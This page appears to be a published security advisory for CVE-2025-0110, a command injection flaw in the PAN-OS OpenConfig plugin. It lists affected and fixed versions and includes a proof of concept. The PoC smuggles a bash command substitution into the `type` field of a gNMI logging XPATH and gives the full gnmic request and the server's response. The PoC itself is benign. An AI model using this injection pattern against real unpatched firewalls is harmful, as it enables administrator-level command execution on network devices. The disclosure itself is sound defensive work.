PaloAlto OpenConfig Plugin: Command Injection Vulnerability
High8.6CVE-2025-0110 · Published Feb 19, 2025
### Summary A vulnerability in PAN-OS OpenConfig allows an authenticated user to run arbitrary commands on the underlying OS. The commands are run as device administrator. ### Details Palo Alto Network Firewalls enable retrieval of syslogs through [gnmi.Subscribe](https://github.com/openconfig/gnmi/blob/b8abd10e9091a4ab6d3894669477b1d396c0ead0/proto/gnmi/gnmi.proto#L73). With the OpenConfig plugin installed, the following [OpenConfig API](https://docs.paloaltonetworks.com/openconfig/2-0/openconfig-admin/pan-os-models/pan-os-openconfig-logging) can be used with the parameterized XPATH: `pan-logging:/pan/logging/query/custom[type=system][direction=fwd][max_logs=2][period=last-24-hrs]` We found that the `type` parameter in the XPATH above can be used to send arbitrary bash commands to be executed on the firewall. ### Severity High - This vulnerability allows for an attacker to run arbitrary bash commands via [gnmi.Subscribe](https://github.com/openconfig/gnmi/blob/b8abd10e9091a4ab6d3894669477b1d396c0ead0/proto/gnmi/gnmi.proto#L73). ### Proof of Concept In order to exploit this vulnerability, we created a request with `type` parameter set to a bash command that writes the string ...
Affected versions
| Package | Affected | Fixed in |
|---|---|---|
| OpenConfig Product | < 2.1.2 | 2.1.2 |
Details and references
### Summary A vulnerability in PAN-OS OpenConfig allows an authenticated user to run arbitrary commands on the underlying OS. The commands are run as device administrator. ### Details Palo Alto Network Firewalls enable retrieval of syslogs through [gnmi.Subscribe](https://github.com/openconfig/gnmi/blob/b8abd10e9091a4ab6d3894669477b1d396c0ead0/proto/gnmi/gnmi.proto#L73). With the OpenConfig plugin installed, the following [OpenConfig API](https://docs.paloaltonetworks.com/openconfig/2-0/openconfig-admin/pan-os-models/pan-os-openconfig-logging) can be used with the parameterized XPATH: `pan-logging:/pan/logging/query/custom[type=system][direction=fwd][max_logs=2][period=last-24-hrs]` We found that the `type` parameter in the XPATH above can be used to send arbitrary bash commands to be executed on the firewall. ### Severity High - This vulnerability allows for an attacker to run arbitrary bash commands via [gnmi.Subscribe](https://github.com/openconfig/gnmi/blob/b8abd10e9091a4ab6d3894669477b1d396c0ead0/proto/gnmi/gnmi.proto#L73). ### Proof of Concept In order to exploit this vulnerability, we created a request with `type` parameter set to a bash command that writes the string `"system"` to a file and reads it back. #### XPATH `/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]` #### Request We utilized [gnmic](https://github.com/openconfig/gnmic) tool to test this exploit. ``` ./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify \ -e json_ietf subscribe --mode once --log \ --path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]' ``` #### Response ``` { "source": "<IP>:<PORT>", "subscription-name": "<>", "timestamp": <>, "time": "<>", "updates": [ { "Path": "/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system \u003e file1; cat file1)]", "values": { "/pan/logging/query/custom": { "code": "200", "message": { ... ``` `system` is a valid value for parameter `type`. Response above shows that the server did successfully execute the bash commands `echo system > file1; cat file1`, producing the output `system` which was then provided
- CVSS 4.0
- CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
- Severity from
- GitHub (reviewed advisory)
More Google advisories
All Google| Date | Advisory | Severity | Fixed in |
|---|---|---|---|
| Mar 282025 | W3C - CSS Validator XXE | High | See the advisory |
| Mar 52025 | PostgreSQL: Privilege Escalation Vulnerability via pg_cron | High | 1.6.5 |
| Feb 192025 | RSync: Heap Buffer Overflow, Info Leak, Server Leaks, Path Traversal and Safe links Bypass | High | 3.4.0 |
| Feb 32025 | AMD: Microcode Signature Verification Vulnerability | High7.2 | 2024-12-13+2 more |
| Jan 102025 | ENGAGE - Server Displaying Sensitive Information | Low | No fix yet |
| Jan 92025 | Integer Overflow in eBPF DEVMAP map_delete_elem Leads to Out-of-Bounds | High7.8 | See the advisory |